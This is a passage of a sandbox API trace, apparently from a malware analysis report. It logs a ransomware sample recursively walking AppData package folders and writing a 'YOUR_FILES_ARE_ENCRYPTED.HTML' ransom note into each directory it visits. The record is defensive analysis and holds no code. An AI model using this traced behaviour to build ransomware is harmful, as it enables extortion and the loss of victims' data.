lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.814] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1") returned 122 [0116.814] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0116.814] lstrlenW (lpString=".LOG1") returned 5 [0116.814] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0116.814] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5ade105, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ade105, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ade105, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0116.815] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.815] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2") returned 122 [0116.815] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0116.815] lstrlenW (lpString=".LOG2") returned 5 [0116.815] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0116.815] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5ade105, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ade105, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ade105, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0116.815] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0116.815] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 134 [0116.815] GetProcessHeap () returned 0x600000 [0116.815] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.815] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.1_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.815] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.816] CloseHandle (hObject=0x320) returned 1 [0116.816] GetProcessHeap () returned 0x600000 [0116.816] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.816] GetProcessHeap () returned 0x600000 [0116.816] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.817] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59f918e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59f918e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59f918e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0116.817] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.817] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\SystemAppData") returned 109 [0116.817] GetProcessHeap () returned 0x600000 [0116.817] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.818] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\SystemAppData" [0116.818] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\SystemAppData\\*" [0116.818] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59f918e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59f918e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59f918e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName=".", cAlternateFileName="")) returned 0x626778 [0116.818] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59f918e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59f918e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59f918e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName="..", cAlternateFileName="")) returned 1 [0116.818] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59f918e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59f918e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59f918e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName="..", cAlternateFileName="")) returned 0 [0116.818] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0116.818] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 139 [0116.818] GetProcessHeap () returned 0x600000 [0116.818] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.1_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.819] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.820] CloseHandle (hObject=0x320) returned 1 [0116.820] GetProcessHeap () returned 0x600000 [0116.820] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.820] GetProcessHeap () returned 0x600000 [0116.820] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.820] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59d3082, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59d3082, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59d3082, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0116.820] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.820] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\TempState") returned 105 [0116.820] GetProcessHeap () returned 0x600000 [0116.820] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.820] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\TempState" [0116.820] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\TempState\\*" [0116.820] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59d3082, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59d3082, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59d3082, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.820] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59d3082, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59d3082, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59d3082, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName="..", cAlternateFileName="")) returned 1 [0116.820] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59d3082, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59d3082, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59d3082, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName="..", cAlternateFileName="")) returned 0 [0116.821] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.821] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 135 [0116.821] GetProcessHeap () returned 0x600000 [0116.821] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.821] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.1_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.821] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.822] CloseHandle (hObject=0x320) returned 1 [0116.822] GetProcessHeap () returned 0x600000 [0116.822] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.822] GetProcessHeap () returned 0x600000 [0116.822] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.823] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59d3082, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59d3082, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59d3082, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0116.823] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0116.823] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0116.823] GetProcessHeap () returned 0x600000 [0116.823] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.823] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.1_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0116.823] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0116.824] CloseHandle (hObject=0x31c) returned 1 [0116.824] GetProcessHeap () returned 0x600000 [0116.825] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.825] GetProcessHeap () returned 0x600000 [0116.825] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0116.825] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64a7f460, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64bd6a07, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6545cdca, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.Office.OneNote_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.ONE")) returned 1 [0116.825] StrStrIW (lpFirst="Microsoft.Office.OneNote_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.826] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe") returned 87 [0116.826] GetProcessHeap () returned 0x600000 [0116.826] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0116.826] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe" [0116.826] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\*" [0116.826] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64a7f460, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64bd6a07, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6545cdca, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.828] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64a7f460, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64bd6a07, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6545cdca, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0116.828] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x64bd6a07, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64bd6a07, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64bd6a07, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0116.828] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.828] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC") returned 90 [0116.828] GetProcessHeap () returned 0x600000 [0116.828] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.829] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC" [0116.829] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\*" [0116.829] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x64bd6a07, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64bd6a07, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64bd6a07, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName=".", cAlternateFileName="")) returned 0x626838 [0116.831] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x64bd6a07, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64bd6a07, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64bd6a07, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName="..", cAlternateFileName="")) returned 1 [0116.831] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x64bd6a07, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64bd6a07, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64bd6a07, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0116.831] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.831] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetCache") returned 100 [0116.831] GetProcessHeap () returned 0x600000 [0116.831] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0116.834] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetCache" [0116.834] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetCache\\*" [0116.834] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x64bd6a07, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64bd6a07, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64bd6a07, 